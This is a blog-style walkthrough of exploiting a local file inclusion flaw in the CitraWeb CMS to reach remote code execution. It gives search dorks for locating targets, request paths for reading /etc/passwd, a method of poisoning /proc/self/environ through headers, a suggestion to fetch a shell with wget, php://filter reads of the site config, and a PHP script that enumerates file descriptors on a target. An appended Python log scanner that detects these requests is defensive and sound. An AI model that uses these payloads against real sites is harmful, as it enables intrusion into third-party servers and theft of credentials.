CitraWeb LFI to RCE




CXSECURITY : cxsecurity.com/issue/WLB-2019060011
> Dork first
DORK:
inurl:/cni-content/*/*.jpg
inurl:/cni-content/*/
intext:Designed & Developed by Citraweb Nusa Info Media
> Assume I already have a vulnerable target. How do I check that it's vulnerable? host.com/system/ajax/?/etc/passwd
> Let's try opening /proc/self/environ
Look, our HTTP headers show up in there :d so we just change an HTTP header :v it can be User-Agent, Accept, Cookie, etc.
Let's try it with Accept
Then just upload a shell :D How? wget, lol :v
What if /proc/self/environ isn't there? :D
You can grab the config :D How?
/system/ajax/?php://filter/convert.base64-encode/resource=cni-system/config/config.php
or you can use /proc/self/fd/{NUMBER}
or /home/{USER}/access-logs/{WEBSITE}

For /proc/self/fd/{NUMBER} I have a tool :D
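<?php
// Request /proc/self/fd/0 .. /proc/self/fd/1000 through the include parameter
// and report which descriptor numbers come back with HTTP 200.
for ($i = 0; $i <= 1000; $i++) {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "https://{WEBSITE HERE}system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/$i");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
  $c = curl_exec($ch);
  $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  curl_close($ch); // free the handle before the next iteration
  if ($http == 200) {
    echo $i . " -> Success\n";
  }
  else {
    echo $i . " -> Failed\n";
  }
}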

- RINTOD -
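
A defender's view of the requests above, as an added example that is not part of the original post: a Python scan of a web access log for the read patterns the post sends to /system/ajax/ and for PHP tags planted in logged headers. The combined log format, the sample lines, the threshold and all function names are assumptions; the Accept and Cookie headers the post mentions are not recorded in a combined-format log, so covering them needs a custom log format.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed "combined" format: ip - - [ts] "METHOD target PROTO" status size "referer" "user-agent"
LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
RULES = {  # one rule per read primitive the post walks through
    "stream-wrapper": re.compile(r'\b(?:php|data|expect|zip|phar)://', re.I),
    "procfs-read": re.compile(r'/proc/self/(?:environ|fd/\d+|cmdline)'),
    "system-file": re.compile(r'/etc/passwd|/access-logs/'),
}
PHP_TAG = re.compile(r'<\?(?:php|=|\s)', re.I)
FD = re.compile(r'/proc/self/fd/(\d+)')

def decode(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding so double-encoded paths are caught."""
    for _ in range(rounds):
        s = unquote(s)
    return s

def scan(lines, endpoint="/system/ajax/", fd_threshold=5):
    """Return (per-request findings, IPs that enumerate /proc/self/fd)."""
    findings, fds = [], defaultdict(set)
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        query = decode(query)
        tags = []
        if path == endpoint:
            tags = [name for name, rx in RULES.items() if rx.search(query)]
            fds[m["ip"]].update(FD.findall(query))
        if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["ref"]):  # code planted for a later include
            tags.append("php-in-header")
        if tags:
            findings.append((n, m["ip"], int(m["status"]), tags))
    enumerators = sorted(ip for ip, seen in fds.items() if len(seen) >= fd_threshold)
    return findings, enumerators

# Constructed sample log lines (documentation IP ranges), not taken from a real server.
_FMT = '{ip} - - [01/Jun/2019:10:00:00 +0000] "GET {t} HTTP/1.1" 200 512 "-" "{ua}"'
SAMPLE = [_FMT.format(ip=ip, t=t, ua=ua) for ip, t, ua in [
    ("203.0.113.7", "/system/ajax/?/etc/passwd", "Mozilla/5.0"),
    ("203.0.113.7", "/system/ajax/?%2Fproc%2Fself%2Fenviron", "<?php /* constructed marker */ ?>"),
    ("203.0.113.7", "/system/ajax/?php://filter/convert.base64-encode/resource=cni-system/config/config.php", "Mozilla/5.0"),
    ("192.0.2.10", "/cni-content/uploads/logo.jpg", "Mozilla/5.0"),
] + [("198.51.100.9", f"/system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/{i}", "curl/7.64.0") for i in range(6)]]
```

A 200 status on a flagged request means the file was probably served, so those hits are the ones to triage first.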

3 Responses to "CitraWeb LFI to RCE"

  1. Write out the code for the wget, damn it, don't just laugh, you bastard :v

  2. I am a new user of this site so here I saw multiple articles and posts posted by this site, I curious more interest in some of them hope you will give more information on this topics in your next articles. whole house water filter

  3. I just couldn't leave your website before telling you that I truly enjoyed the top quality info you present to your visitors? Will be back again frequently to check up on new posts. Visit website

